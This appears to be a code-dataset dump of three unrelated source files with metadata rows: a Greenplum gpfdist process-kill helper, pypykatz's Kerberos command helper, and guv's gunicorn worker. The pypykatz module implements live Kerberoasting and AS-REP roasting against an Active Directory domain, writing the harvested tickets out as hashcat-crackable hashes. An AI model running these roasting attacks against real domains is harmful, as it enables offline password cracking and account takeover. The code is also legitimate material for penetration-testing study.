cmd = "gpssh -h %s '%s'" %(self.hostname, cmd_str)
res = {'rc':0, 'stderr':'', 'stdout':''}
run_shell_command(cmd, 'gpfdist port check', res)
content = res['stdout']
# strip hostname prefix from gpssh output
content = content.replace(self.hostname, '').strip('[]').strip()
if len(content)>0:
return False
return True
def is_gpfdist_killed(self, port=None, wait=1):
"""
Check whether the gpfdist process is killed
"""
if port is None:
port = self.port
process_killed = False
count = 0
while (not process_killed and count < wait):
cmd_str = " | ".join([
self.ps_command + ' -ef',
'grep \"[g]pfdist -p %s\"' % (port)])
cmd = "gpssh -h %s '%s'" %(self.hostname, cmd_str)
res = {'rc':0, 'stderr':'', 'stdout':''}
run_shell_command(cmd, 'gpfdist process check', res)
content = res['stdout']
# strip hostname prefix from gpssh output
content = content.replace(self.hostname, '').strip('[]').strip()
if len(content)>0 or content.find("gpfdist -p %s" %port) > 0:
tinctest.logger.warning("gpfdist process still exists on %s:%s" %(self.hostname, self.port))
else:
return True
count = count + 1
time.sleep(1)
tinctest.logger.warning("gpfdist process not killed on %s:%s" %(self.hostname, self.port))
return False
def killGpfdist(self, wait=60, port=None):
"""
kill the gpfdist process
@change: Johnny Soedomo, check from netstat whether the system has released the process rather than waiting a flat 10s
@todo: Support for stopping gpfdist process on remote host
"""
if port is None:
port = self.port
cmd_str = ' | '.join([self.ps_command + " -ef",
"grep \"[g]pfdist -p %s\"" % (port),
"awk '\"'\"'{print $2}'\"'\"'",
"xargs kill"])
cmd = "gpssh -h %s '%s'" %(self.hostname, cmd_str)
res = {'rc':0, 'stderr':'', 'stdout':''}
run_shell_command(cmd, 'kill gpfdist', res)
if not self.is_gpfdist_killed():
raise GPFDISTError("Could not kill gpfdist process on %s:%s" %(self.hostname, self.port))
# Make sure the port is released
is_released = False
count = 0
while (not is_released and count < wait):
is_released = self.is_port_released()
count = count + 1
time.sleep(1)
| 36.561905 | 126 | 0.563558 | 955 | 7,678 | 4.458639 | 0.246073 | 0.028182 | 0.011273 | 0.026303 | 0.361202 | 0.31024 | 0.293095 | 0.24636 | 0.207374 | 0.191874 | 0 | 0.008484 | 0.324564 | 7,678 | 209 | 127 | 36.736842 | 0.812572 | 0.219458 | 0 | 0.426471 | 0 | 0.007353 | 0.141295 | 0.003645 | 0 | 0 | 0 | 0.009569 | 0.029412 | 1 | 0.073529 | false | 0.007353 | 0.044118 | 0.022059 | 0.213235 | 0.007353 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6266b4ad7653f1d02ea5b3cceb5fbba1ed6b3402 | 4,605 | py | Python | pypykatz/kerberos/cmdhelper.py | m0xbf/pypykatz-copy | 39d8b06861d9ccd615e8107707f56f6556fb15a0 | [
"MIT"
] | 5 | 2019-04-20T05:34:01.000Z | 2019-10-12T01:26:09.000Z | pypykatz/kerberos/cmdhelper.py | m0xbf/pypykatz-copy | 39d8b06861d9ccd615e8107707f56f6556fb15a0 | [
"MIT"
] | 1 | 2018-09-13T15:20:29.000Z | 2018-09-13T15:20:29.000Z | pypykatz/kerberos/cmdhelper.py | m0xbf/pypykatz-copy | 39d8b06861d9ccd615e8107707f56f6556fb15a0 | [
"MIT"
] | 8 | 2018-09-11T22:02:22.000Z | 2019-11-27T08:52:20.000Z | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
from pypykatz import logging
"""
Kerberos is not part of pypykatz directly.
This is a wrapper for minikerberos and winsspi packages
"""
class KerberosCMDHelper:
def __init__(self):
self.live_keywords = ['kerberos']
self.keywords = []
def add_args(self, parser, live_parser):
live_group = live_parser.add_parser('kerberos', help='Kerberos (live) related commands')
live_group.add_argument('-c','--credential', help= 'Credential to be used, if omitted it will use teh credentials of the current user. If specified, it will try to impersonate the user. (requires the the target user has a session on the local computer)')
live_group.add_argument('--dc-ip', help= 'IP address or hostname of the LDAP server. Optional. If omitted will use registry to check for the DC.')
live_group.add_argument('cmd', choices=['spnroast', 'asreproast'])
live_group.add_argument('-o','--out-file', help= 'File to stroe results in')
live_group.add_argument('-t','--target-file', help= 'List of target users to roast. One user per line. Format: asreproast->username spnroast->domain/username')
live_group.add_argument('-u','--target-user', action='append', help='Target users to roast in <realm>/<username> format or just the <username>, if -r is specified. Can be stacked.')
live_group.add_argument('-r','--realm', help= 'Kerberos Realm.')
def execute(self, args):
if len(self.keywords) > 0 and args.command in self.keywords:
self.run(args)
if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
self.run_live(args)
def run_live(self, args):
from winsspi.sspi import KerberoastSSPI
from minikerberos.security import TGSTicket2hashcat, APREPRoast
from minikerberos.utils import TGTTicket2hashcat
from minikerberos.communication import KerberosSocket
from minikerberos.common import KerberosTarget
from pypykatz.commons.winapi.machine import LiveMachine
if not args.target_file and not args.target_user:
raise Exception('No targets loaded! Either -u or -t MUST be specified!')
machine = LiveMachine()
realm = args.realm
if not args.realm:
realm = machine.get_domain()
if args.cmd in ['spnroast','asreproast']:
targets = []
if args.target_file:
with open(args.target_file, 'r') as f:
for line in f:
line = line.strip()
domain = None
username = None
if line.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = line.split('/')
else:
username = line
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception('Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file')
target = KerberosTarget()
target.username = username
target.domain = domain
targets.append(target)
if args.target_user:
for user in args.target_user:
domain = None
username = None
if user.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = user.split('/')
else:
username = user
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception('Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file')
target = KerberosTarget()
target.username = username
target.domain = domain
targets.append(target)
results = []
errors = []
if args.cmd == 'spnroast':
for spn_name in targets:
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(spn_name.get_formatted_pname())
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
elif args.cmd == 'asreproast':
dcip = args.dc_ip
if args.dc_ip is None:
dcip = machine.get_domain()
ks = KerberosSocket( dcip )
ar = APREPRoast(ks)
results = ar.run(targets)
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in results:
f.write(thash + '\r\n')
else:
for thash in results:
print(thash)
for err in errors:
print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))
logging.info('SSPI based Kerberoast complete')
def run(self, args):
raise NotImplementedError('Platform independent kerberos not implemented!') | 33.860294 | 256 | 0.675136 | 633 | 4,605 | 4.835703 | 0.293839 | 0.023522 | 0.027442 | 0.045737 | 0.227377 | 0.196668 | 0.196668 | 0.196668 | 0.196668 | 0.196668 | 0 | 0.002772 | 0.216504 | 4,605 | 136 | 257 | 33.860294 | 0.845621 | 0.039739 | 0 | 0.27 | 0 | 0.06 | 0.269204 | 0.005802 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.07 | 0 | 0.13 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6266bd836140f1c3ba30f0075104aec7b0ac4181 | 9,354 | py | Python | guv/support/gunicorn_worker.py | timgates42/guv | d7bac2ca6a73cc2059969af08223b82f3e187922 | [
"MIT"
] | 120 | 2015-01-05T15:15:26.000Z | 2020-07-28T11:25:10.000Z | guv/support/gunicorn_worker.py | timgates42/guv | d7bac2ca6a73cc2059969af08223b82f3e187922 | [
"MIT"
] | 22 | 2015-01-12T21:52:32.000Z | 2017-01-22T18:18:20.000Z | guv/support/gunicorn_worker.py | timgates42/guv | d7bac2ca6a73cc2059969af08223b82f3e187922 | [
"MIT"
] | 13 | 2015-01-18T11:42:34.000Z | 2021-07-15T10:59:22.000Z | from functools import partial
import errno
import sys
from datetime import datetime
import socket
import ssl
import greenlet
import logging
from gunicorn import http, util
from gunicorn.http import wsgi
from gunicorn.http.wsgi import sendfile as o_sendfile
from gunicorn.workers import base
import guv
import guv.wsgi
from guv import hubs, greenthread, greenpool, StopServe, trampoline, gyield
from guv.greenio import socket as gsocket
from guv.support import get_errno, reraise
from guv.const import WRITE
from guv.exceptions import BROKEN_SOCK
ALREADY_HANDLED = object()
log = logging.getLogger('guv')
class AsyncWorker(base.Worker):
"""
This class is a copy of the AsyncWorker included in gunicorn, with a few minor modifications:
- Removed python 2 support
- Improved request latency for keep-alive connections by yielding after each request
- Graceful quit on ctrl-c by overriding handle_quit
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.worker_connections = self.cfg.worker_connections
def handle_quit(self, sig, frame):
"""
We override this because sys.exit() shouldn't be called. Instead, we should let the
worker gracefully quit on its own.
"""
# sys.stderr.write('handle_quit() frame: {0}, '
# '{0.f_code.co_filename}:{0.f_code.co_name}:{0.f_lineno}\n'
# .format(frame))
sys.stderr.flush()
self.alive = False
# worker_int callback
self.cfg.worker_int(self)
# sys.exit(0)
def timeout_ctx(self):
raise NotImplementedError()
def handle(self, server_sock, client_sock, addr):
"""Handle client connection
The client may send one or more requests.
"""
req = None
try:
parser = http.RequestParser(self.cfg, client_sock)
try:
server_name = server_sock.getsockname()
if not self.cfg.keepalive:
req = next(parser)
self.handle_request(server_name, req, client_sock, addr)
else:
# keepalive loop
while True:
req = None
with self.timeout_ctx():
req = next(parser)
if not req:
break
self.handle_request(server_name, req, client_sock, addr)
gyield()
except http.errors.NoMoreData as e:
self.log.debug("Ignored premature client disconnection. %s", e)
except StopIteration as e:
self.log.debug("Closing connection. %s", e)
except ssl.SSLError:
exc_info = sys.exc_info()
# pass to next try-except level
reraise(exc_info[0], exc_info[1], exc_info[2])
except socket.error:
exc_info = sys.exc_info()
# pass to next try-except level
reraise(exc_info[0], exc_info[1], exc_info[2])
except Exception as e:
self.handle_error(req, client_sock, addr, e)
except ssl.SSLError as e:
if get_errno(e) == ssl.SSL_ERROR_EOF:
self.log.debug("ssl connection closed")
client_sock.close()
else:
self.log.debug("Error processing SSL request.")
self.handle_error(req, client_sock, addr, e)
except socket.error as e:
if get_errno(e) not in BROKEN_SOCK:
self.log.exception("Socket error processing request.")
else:
if get_errno(e) == errno.ECONNRESET:
self.log.debug("Ignoring connection reset")
else:
self.log.debug("Ignoring EPIPE")
except Exception as e:
self.handle_error(req, client_sock, addr, e)
finally:
util.close(client_sock)
def handle_request(self, listener_name, req, sock, addr):
request_start = datetime.now()
environ = {}
resp = None
try:
self.cfg.pre_request(self, req)
resp, environ = wsgi.create(req, sock, addr,
listener_name, self.cfg)
environ["wsgi.multithread"] = True
self.nr += 1
if self.alive and self.nr >= self.max_requests:
self.log.info("Autorestarting worker after current request.")
resp.force_close()
self.alive = False
if not self.cfg.keepalive:
resp.force_close()
respiter = self.wsgi(environ, resp.start_response)
if respiter == ALREADY_HANDLED:
return False
try:
if isinstance(respiter, environ['wsgi.file_wrapper']):
resp.write_file(respiter)
else:
for item in respiter:
resp.write(item)
resp.close()
request_time = datetime.now() - request_start
self.log.access(resp, req, environ, request_time)
except socket.error as e:
# BROKEN_SOCK not interesting here
if not get_errno(e) in BROKEN_SOCK:
raise
finally:
if hasattr(respiter, "close"):
respiter.close()
if resp.should_close():
raise StopIteration()
except StopIteration:
raise
except Exception:
if resp and resp.headers_sent:
# If the requests have already been sent, we should close the
# connection to indicate the error.
self.log.exception("Error handling request")
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except socket.error:
pass
raise StopIteration()
raise
finally:
try:
self.cfg.post_request(self, req, environ, resp)
except Exception:
self.log.exception("Exception in post_request hook")
return True
def _guv_sendfile(fdout, fdin, offset, nbytes):
while True:
try:
return o_sendfile(fdout, fdin, offset, nbytes)
except OSError as e:
if get_errno(e) == errno.EAGAIN:
if not isinstance(fdout, int):
fd = fdout.fileno()
else:
fd = fdout
trampoline(fd, WRITE)
else:
raise
def _guv_serve(sock, handle, concurrency):
pool = greenpool.GreenPool(concurrency)
server_gt = greenlet.getcurrent()
while True:
try:
conn, addr = sock.accept()
gt = pool.spawn(handle, conn, addr)
gt.link(_guv_stop, server_gt, conn)
conn, addr, gt = None, None, None
except StopServe:
pool.waitall()
return
def _guv_stop(client, server, conn):
"""Stop a greenlet handling a request and close its connection
This code is lifted from eventlet so as not to depend on undocumented
functions in the library.
"""
try:
try:
client.wait()
finally:
conn.close()
except greenlet.GreenletExit:
pass
except Exception:
greenthread.kill(server, *sys.exc_info())
def patch_sendfile():
from gunicorn.http import wsgi
if o_sendfile is not None:
setattr(wsgi, "sendfile", _guv_sendfile)
class GuvWorker(AsyncWorker):
def patch(self):
guv.monkey_patch(os=False)
patch_sendfile()
def init_process(self):
hubs.use_hub()
self.patch()
super().init_process()
def timeout_ctx(self):
return guv.Timeout(self.cfg.keepalive or None, False)
def handle(self, server_sock, client_sock, addr):
if self.cfg.is_ssl:
client_sock = guv.wrap_ssl(client_sock, server_side=True, **self.cfg.ssl_options)
super().handle(server_sock, client_sock, addr)
def run(self):
acceptors = []
for sock in self.sockets:
gsock = gsocket(sock.FAMILY, socket.SOCK_STREAM, fileno=sock.fileno())
gsock.setblocking(1)
hfun = partial(self.handle, gsock)
acceptor = guv.spawn(_guv_serve, gsock, hfun, self.worker_connections)
acceptors.append(acceptor)
guv.gyield()
try:
while self.alive:
self.notify()
guv.sleep(self.timeout / 2)
except (KeyboardInterrupt, SystemExit):
log.debug('KeyboardInterrupt, exiting')
self.notify()
try:
with guv.Timeout(self.cfg.graceful_timeout) as t:
for a in acceptors:
a.kill(guv.StopServe())
for a in acceptors:
a.wait()
except guv.Timeout as te:
if te != t:
raise
for a in acceptors:
a.kill()
log.debug('GuvWorker exited')
| 32.821053 | 97 | 0.550994 | 1,043 | 9,354 | 4.824545 | 0.255992 | 0.025835 | 0.022258 | 0.016892 | 0.161963 | 0.107512 | 0.091216 | 0.091216 | 0.07651 | 0.050079 | 0 | 0.002529 | 0.365833 | 9,354 | 284 | 98 | 32.93662 | 0.845752 | 0.106051 | 0 | 0.344186 | 0 | 0 | 0.045075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065116 | false | 0.009302 | 0.093023 | 0.004651 | 0.190698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |